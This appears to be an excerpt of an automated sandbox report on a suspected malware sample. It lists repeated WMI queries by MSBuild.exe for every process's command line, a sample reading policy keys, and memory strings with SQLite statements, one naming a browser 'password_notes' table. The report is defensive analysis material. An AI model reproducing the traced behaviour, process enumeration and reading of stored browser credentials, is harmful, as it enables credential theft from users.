Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2612
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3696
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4988
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2400
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3692
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5036
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5896
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2392
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1952
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6836
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 428
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4104
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6256
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1944
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6684
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3664
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4572
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1936
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4952
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6244
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7104
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1068
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 632
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1056
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1632
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4068
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1048
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5788
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5356
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4924
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2768
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5776
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1532
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1032
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1892
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1028
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6196
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3608
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6624
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4752
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1084
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7084
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6616
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1436
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3920
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1772
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4880
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3428
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2604
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3584
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 564
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1424
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 992
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6044
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1852
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6592
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1416
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 984
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4856
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1836
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3852
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3984
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6568
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1076
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4836
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 92
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1384
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4828
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4396
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5256
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2668
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5684
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6968
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3092
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 504
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6708
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6532
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 496
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 924
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6952
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6948
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1344
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2204
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3496
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6512
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2628
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5932
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6792
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3484
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5308
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4772
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3512
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1324
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1288
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6484
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6052
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1396
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 444
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5284
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2596
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2588
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 0
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\sx8RE6LbG0.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: u2ts.0.exe, 00000002.00000002.2630583484.000000006BD8F000.00000002.00000001.01000000.00000010.sdmp, u2ts.0.exe, 00000002.00000002.2586476755.000000001C018000.00000004.00000020.00020000.00000000.sdmp, u2ts.0.exe, 00000002.00000002.2627100243.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: u2ts.0.exe, 00000002.00000002.2630583484.000000006BD8F000.00000002.00000001.01000000.00000010.sdmp, u2ts.0.exe, 00000002.00000002.2586476755.000000001C018000.00000004.00000020.00020000.00000000.sdmp, u2ts.0.exe, 00000002.00000002.2627100243.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: u2ts.0.exe, 00000002.00000002.2630583484.000000006BD8F000.00000002.00000001.01000000.00000010.sdmp, u2ts.0.exe, 00000002.00000002.2586476755.000000001C018000.00000004.00000020.00020000.00000000.sdmp, u2ts.0.exe, 00000002.00000002.2627100243.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: u2ts.0.exe, 00000002.00000002.2630583484.000000006BD8F000.00000002.00000001.01000000.00000010.sdmp, u2ts.0.exe, 00000002.00000002.2586476755.000000001C018000.00000004.00000020.00020000.00000000.sdmp, u2ts.0.exe, 00000002.00000002.2627100243.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: u2ts.0.exe, 00000002.00000002.2630583484.000000006BD8F000.00000002.00000001.01000000.00000010.sdmp, u2ts.0.exe, 00000002.00000002.2586476755.000000001C018000.00000004.00000020.00020000.00000000.sdmp, u2ts.0.exe, 00000002.00000002.2627100243.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: u2ts.0.exe, 00000002.00000002.2630583484.000000006BD8F000.00000002.00000001.01000000.00000010.sdmp, u2ts.0.exe, 00000002.00000002.2586476755.000000001C018000.00000004.00000020.00020000.00000000.sdmp, u2ts.0.exe, 00000002.00000002.2627100243.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: u2ts.0.exe, 00000002.00000002.2586476755.000000001C018000.00000004.00000020.00020000.00000000.sdmp, u2ts.0.exe, 00000002.00000002.2627100243.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: u2ts.0.exe, 00000002.00000003.2097967971.00000000220C8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: u2ts.0.exe, 00000002.00000002.2586476755.000000001C018000.00000004.00000020.00020000.00000000.sdmp, u2ts.0.exe, 00000002.00000002.2627100243.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
